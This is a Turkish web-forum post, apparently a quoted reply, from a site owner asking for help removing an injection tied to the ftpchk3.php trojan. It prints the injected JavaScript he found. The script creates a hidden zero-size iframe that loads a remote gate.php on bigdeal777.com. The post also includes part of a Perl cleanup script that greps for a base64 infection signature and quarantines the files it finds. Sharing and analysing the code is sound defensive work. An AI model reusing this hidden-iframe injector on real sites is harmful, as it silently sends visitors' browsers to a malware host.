Cemaliozan] Merhaba arkadaşlar adlı üyeden alıntı
/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
document.cookie='1=1;expires='+e.toGMTString()+';path=/';
window.setTimeout(function(){
var JSinj=document.createElement('iframe');
//Bu adres satırı değişebiliyor
JSinj.src='http://bigdeal777.com/gate.php?f=977533&r='+escape(document.referrer||'');
JSinj.width='0';
JSinj.height='0';
JSinj.frameborder='0';
JSinj.marginheight='0';
JSinj.marginwidth='0';
JSinj.border='0';
try{
document.body.appendChild(JSinj);
}catch(e){
document.documentElement.appendChild(JSinj);
}
}, 2000);
}
/*qpi*/ [/PHP]
Tüm host dosyalarını lokale indirdim, kendi bilgisayarımda güncel bir kaç antivirüs ve malware ile taradım. Eklenmiş kodları temizleyip tekrar salt okunura ayarladım. Sağdan soldan alıpta kullandığım kod yoktur. Kodlarımın Bir kaç javascript kodu hariç tamamı bana aittir. Dolayısıyla içlerinde ne olduğunu iyi biliyorum. Veri tabanlarınıda olası bir script/code açığı bakımından kontrol ettim. Herhangi bir aksaklığa rastlamadım.
Yaklaşık 15 gündür internette aramadığım yer kalmadı, sonunda ftpchk3.php isimli bir trojan dosyasının benzer saldırılar yaptığını öğrendim. Bu dosya benim klasörlerimin hiç birinde yok. Godaddy sunucuları bu tür dosyaların bulaşmasına karşı gerekli önlemleri almışlar. (Bir kaç sefer adı ftpchk3.php olan içi boş dosya oluşturup denedim anında silindi.) Fakat her nasılsa benim sorunumu çözemediler.
Bu tip virüsün temizlenmesi ile ilgili olarak bir perl kodu buldum. Hem perl hem php bilgisi olan biri bu kodu php'ye çevirirse memnun olurum. Bu virüsle daha önce uğraşan arkadaşların konu hakkındaki yorum ve çözüm önerilerini bekliyorum.
PERL Kodu :
PHP Kodu:
#!/usr/bin/perl
# http://digitalpbk.blogspot.com/2009/10/ftpchk3-virus-php-pl-hacked-website.html
use strict;
`grep -Rn aWYoIWlzc2V0KCRiMHNyMSkpe2Z1bmN0aW9u * | cut -d ':' -f 1 > listofinfected`;
open FP,"listofinfected";
my $file;
while($file = ){
print "Testing $file ... ";
chomp($file);
if(-e ($file)){
open VI,$file;
my @filecon = ;
close VI;
if($filecon[0] =~ m/aWYoIWlzc2V0KCRiMHNyMSkpe2Z1bmN0aW9u/){
$filecon[0] =~ s/(<\?.*?\?>)//g;
rename($file,$file.".infected");